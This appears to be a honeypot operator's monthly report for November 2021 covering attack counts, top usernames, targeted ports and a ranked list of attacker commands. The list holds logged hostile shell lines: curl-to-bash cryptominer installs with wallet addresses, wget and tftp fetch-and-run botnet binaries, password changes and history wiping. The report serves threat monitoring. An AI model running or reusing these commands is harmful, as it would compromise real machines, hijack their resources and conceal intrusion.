November 2021

November showed us very similar stats to October. We still see the bulk of the attacks from the US.

The average daily attack sits around 20,000 attacks, This has been consistent over the past few months, There was only one instance where there was a spike in attacks.

We still see root/admin dominating the connections.

The monthly direct TCP attacks almost look identical to October with on port 80 being the top target. Interesting visiting shows ‘file not found’. The second common target is (Yandex)

Again the top command for the second-month running is an echo -e “\x6F\x6B”, Followed by mining bots. It seems the same group using address, What is interesting is more than a quarter top commands are related to mining bots all referencing c3mining pool.

CMD: echo -e “\x6F\x6B”1061
CMD: pkill xmrig; curl -s -L | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; apt install dos2unix -y; yum install dos2unix -y; curl -O; chmod 777 a; dos2unix a; ./a; rm -rf a; history -c; pkill Xorg; pkill cnrig; pkill x86_64; pkill x86; pkill java; pkill python; pkill screen223
CMD: uname -a;lspci | grep -i –color ‘vga\|3d\|2d’;curl -s -L | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr112
CMD: perl /var/tmp/;rm -rf /var/tmp/clamav.pl86
CMD: scp -t /var/tmp/clamav.pl86
CMD: curl -s -L | LC_ALL=en_US.UTF-8 bash -s 46viFQGtRgsGxtygv2zwGiT2Pb66B2MxzfnvEJVDu16HQKqTQmZAVw5CQmGBskKq1JCcoMKUpAQ38WUmNZcfWFMa6trEvJf78
CMD: echo `hostname`;echo -e `hostname`n`hostname` | passwd; curl -s -L | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA75
CMD: wget; wget; wget; wget; wget; wget; wget; wget; wget; wget; wget; chmod 777 *; ./arc x86; ./arm x86; ./arm5 x86; ./arm6 x86; ./arm7 x86; ./i586 x86; ./i686 x86; ./mips x86; ./mipsel x86; ./sh4 x86; ./x86_64 x8668
CMD: uname -s -v -n -r -m58
CMD: uname -msn45
CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 *; sh; tftp -g -r; chmod 777 *; sh; rm -rf *.sh; history -c40
CMD: curl -s -L | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA36
CMD: uname -a34
CMD: curl -s -L | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ33
CMD: rm -rf /tmp/2sh; wget -c -P /tmp && sh /tmp/2sh &23
CMD: rm -rf /var/run/1sh; wget -c -P /var/run && sh /var/run/1sh &23
CMD: wget -qO – | sh > /dev/null 2>&1 &23
CMD: wget -qO – | sh > /dev/null 2>&1 &23
CMD: /ip cloud print22
CMD: cat /proc/cpuinfo22